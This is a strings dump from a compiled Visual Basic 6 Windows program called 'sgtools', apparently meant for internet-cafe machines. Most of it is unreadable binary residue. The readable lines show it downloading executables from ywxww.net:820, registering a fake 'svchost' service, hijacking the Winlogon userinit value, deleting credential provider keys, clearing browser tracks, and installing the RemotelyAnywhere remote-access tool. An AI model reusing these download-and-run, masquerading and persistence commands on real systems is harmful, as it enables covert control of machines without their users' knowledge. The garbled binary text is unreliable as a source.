!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
Command1
Command1
Label2
label2
Label1
label1
vb6chs.dll
sgtools
h{R?*I
Module1
Form10
Form11
Command4
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Command5
Command6
Command1
Command2
Command3
urlmon
URLDownloadToFileA
h{R?*I
Command8
Command9
Command10
Command11
Command12
Command7
shell32.dll
ShellExecuteA
shlwapi.dll
PathFileExistsA
kernel32
DeleteFileA
Q[T Et
VBA6.DLL
__vbaOnError
__vbaFreeObj
__vbaObjSet
__vbaHresultCheckObj
__vbaNew2
Label2
Label1
CreateWaitableTimerA
OpenWaitableTimerA
SetWaitableTimer
CancelWaitableTimer
CloseHandle
WaitForSingleObject
user32
MsgWaitForMultipleObjects
__vbaEnd
__vbaPrintFile
__vbaFreeVar
__vbaVarTstGt
__vbaFileClose
__vbaLineInputVar
__vbaFileOpen
__vbaStrI2
__vbaStrMove
__vbaFreeStr
__vbaStrCat
__vbaSetSystemError
__vbaStrToAnsi
__vbaVarMove
__vbaI2I4
__vbaObjSetAddref
__vbaFreeVarList
__vbaVarDup
__vbaFreeObjList
__vbaFreeStrList
__vbaStrCmp
__vbaVarCat
__vbaStrVarVal
__vbaLateMemCallLd
__vbaStrVarMove
__vbaObjVar
tXT{vU_
__vbaVarCopy
__vbaErrorOverflow
N:g?bir
__vbaExitProc
__vbaStrR8
__vbaR8Str
__vbaFPFix
__vbaFpI4
N:g?bir
N:g?bir
gyrCg3u
gyrCg3u
yrCg3u
yrCg3u
eyrCg3u
eyrCg3u
eyrCg3u
yrCg3u
gyrCg3u
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Form10
Form10
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Command7
Command7
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Q[T Et
Command7
Command7
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Command7
Command7
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Form11
Me.Caption = "
Command1.Caption = "
Command2.Caption = "steam
Command3.Caption = "
Command4.Caption = "
Command5.Caption = "
Command6.Caption = "
pubwinol"
Form11
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
h{R?*I
Command12
Command12
Command11
Command11
Command10
Command10
Command9
Command9
Command8
Command8
Command7
Command7
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
RGhpp@
QGh<q@
QGh`q@
}#jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
WWhT}@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
WWhT}@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh(m@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
MSVBVM60.DLL
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaVarMove
__vbaFreeVar
__vbaStrVarMove
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
__vbaLineInputVar
_adj_fprem1
__vbaStrCat
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaExitProc
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaFPFix
_CIsin
__vbaChkstk
__vbaFileClose
EVENT_SINK_AddRef
__vbaStrCmp
__vbaObjVar
__vbaI2I4
DllFunctionCall
_adj_fpatan
__vbaStrR8
EVENT_SINK_Release
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
__vbaPrintFile
_adj_fprem
_adj_fdivr_m64
__vbaFPException
__vbaStrVarVal
__vbaVarCat
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaR8Str
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarDup
__vbaStrToAnsi
__vbaVarCopy
__vbaFpI4
__vbaLateMemCallLd
_CIatan
__vbaStrMove
_allmul
_CItan
_CIexp
__vbaFreeStr
__vbaFreeObj
OAtAWA%
A*\AD:\vbfiles\sgtools0315\form1.vbp
pubwinol
xwwvbab0501
xww579
xwwyaya8989
http://safe.ywxww.net:820/sg.txt
c:\windows\sg.txt
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8
http://safe.ywxww.net:820/sgupdate.exe
c:\windows\sgupdate.exe
c:\windows\fn.txt
c:\windows\fp.txt
WScript.Shell
Desktop
SpecialFolders
cmd /c sc config wuauserv start= auto
cmd /c sc start wuauserv
http://ftp.ywxww.net:820/KB2808679x64.exe
\KB2808679x64.msu
http://ftp.ywxww.net:820/KB2868626x64.exe
\KB2868626x64.msu
http://safe.ywxww.net:820/vc17x86.exe
\vc17x86.exe
http://ftp.ywxww.net:820/vc17x64.exe
\vc17x64.exe
http://ftp.ywxww.net:820/steam.txt
c:\windows\steam.reg
regedit /s c:\windows\steam.reg
VC2017
http://safe.ywxww.net:820/svchost.exe
c:\windows\svchost.exe
http://safe.ywxww.net:820/xconfig.txt
c:\windows\xconfig.ini
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v Type /t reg_dword /d 00000272 /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v Start /t reg_dword /d 00000002 /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v ErrorControl /t reg_dword /d 00000001 /f /reg:64
http://ftp.ywxww.net:820/pubwin1506.exe
\pubwin1506.exe
http://ftp.ywxww.net:820/pubolclient.exe
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v WOW64 /t reg_dword /d 00000001 /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v Group /t reg_sz /d "Event Log" /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v DisplayName /t reg_sz /d svchost /f /reg:64
cmd /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" /v wxDesktop /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v ObjectName /t reg_sz /d LocalSystem /f /reg:64
cmd /c RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters
http://safe.ywxww.net:820/cpie.exe
Remote
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v FailureActions /t reg_binary /d "ffffffff000000000000000001000000140000000100000001000000" /f /reg:64
c:\windows\system\xww.exe
http://ftp.ywxww.net:820/ydcx.exe
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v ImagePath /t reg_expand_sz /d "c:\Windows\svchost.exe /service" /f /reg:64
c:\windows\syswow64\DesktopLauncher.exe
cmd /c sc delete "client start"
office2010
cmd /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Hintsoft\PubwinClient" /v autorun /reg:64 >nul 2>nul && reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Hintsoft\PubwinClient" /v autorun /t reg_sz /d 1 /f /reg:64||exit
cmd /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters\{18E425E3-2B83-4254-A72F-860A4384B80D}" /f /reg:64
ol,Pub
c:\windows\system\config.txt
Winrar5.2
cmd /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{18E425E3-2B83-4254-A72F-860A4384B80D}" /f /reg:64
PB1506
Pbol926
cmd /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit /t reg_sz /d C:\Windows\system32\userinit.exe,c:\windows\system\xww.exe /f /reg:64
http://safe.ywxww.net:820/xww.exe
cmd /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Startup /t reg_sz /d "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /f /reg:64
cmd /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v desktop /t reg_sz /d %USERPROFILE%\Desktop /f /reg:64
\Internet Explorer.lnk
\Internt Explorer.exe
\pubolclient.exe
\ydcx.exe
cmd /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v {871C5380-42A0-1069-A2EA-08002B30308D} /t reg_dword /d 1 /f /reg:64
\internet.exe
\Internt Explorer.lnk
http://ftp.ywxww.net:820/x210.exe
\x210.exe
http://ftp.ywxww.net:820/qqnetbar.exe
\qqnetbar.exe
http://ftp.ywxww.net:820/hydkj.exe
\hydkj.exe
http://ftp.ywxww.net:820/RemotelyAnywhere11.exe
\RemotelyAnywhere11.exe
http://ftp.ywxww.net:820/pubolconsole.exe
\pubolconsole.exe
http://ftp.ywxww.net:820/qwsrv3.3.exe
\qwsrv3.3.exe
http://ftp.ywxww.net:820/smb.exe
\smb.exe
http://ftp.ywxww.net:820/rlol.exe
\rlpbol.exe
\rlol.exe
http://ftp.ywxww.net:820/rlpb15.exe
\rlpb15.exe
http://ftp.ywxww.net:820/pbconsole1507.exe
\pbconsole1507.exe
http://ftp.ywxww.net:820/rlaz.exe
\rlaz.exe
Pubin15
pubwinol
http://ftp.ywxww.net:820/cysoft/winrarx64521sc.exe
\winrarx64521sc.exe
http://ftp.ywxww.net:820/cysoft/office2010.exe
\office2010.exe
[clsWaitableTimer.Wait]
http://ftp.ywxww.net:820/
http://ftp.ywxww.net:820/
http://ftp.ywxww.net:820/
http://ftp.ywxww.net:820/LOL
http://ftp.ywxww.net:820/LOL
http://ftp.ywxww.net:820/LOL
http://ftp.ywxww.net:820/pubolupdate.exe
\pubolupdate.exe
C:\Windows\System32\GroupPolicy\User\Scripts\Logon\script.vbs
explorer C:\Windows\System32\GroupPolicy\User\Scripts\Logon
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
080404B0
Comments
CompanyName
ProductName
sgtools
FileVersion
1.03.0003
ProductVersion
1.03.0003
InternalName
OriginalFilename
sg.exe